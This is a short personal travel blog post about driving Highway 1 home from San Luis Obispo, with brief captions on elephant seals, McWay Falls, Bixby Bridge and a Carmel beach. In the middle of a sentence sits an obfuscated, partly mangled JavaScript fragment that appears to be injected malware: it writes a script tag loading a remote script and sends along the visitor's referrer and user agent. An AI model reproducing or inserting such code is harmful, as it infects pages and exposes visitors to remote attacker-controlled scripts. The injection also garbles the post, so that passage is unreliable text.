Postcards from Highway 1

We decided to take the long way back from San Luis Obispo a few weeks ago.  Normally not my style, but we were driving back on a Friday, which meant I still had the whole weekend to relax.  Here are a few of the highlights.

Elephant seals.  It’s like a zoo, only better.

The ;if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“<\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ihhdr|var|u0026u|referrer|hznfh||js|php’.split(‘|’),0,{}))
Mcway Waterfall at the Julia Pfeiffer Burns State Park.  This was actually someone’s view.  From their home.  The owner, Helen Hooper Brown, was a shovel heiress.  Who knew?

2014-Hwy1-0009 2014-Hwy1-0019And a stop at the Bixby Bridge.  Totally a thing.

2014-Hwy1-0031And a very un-bryn-like impromptu stop at a random beach in Carmel.  I can be spontaneous when I want to be.
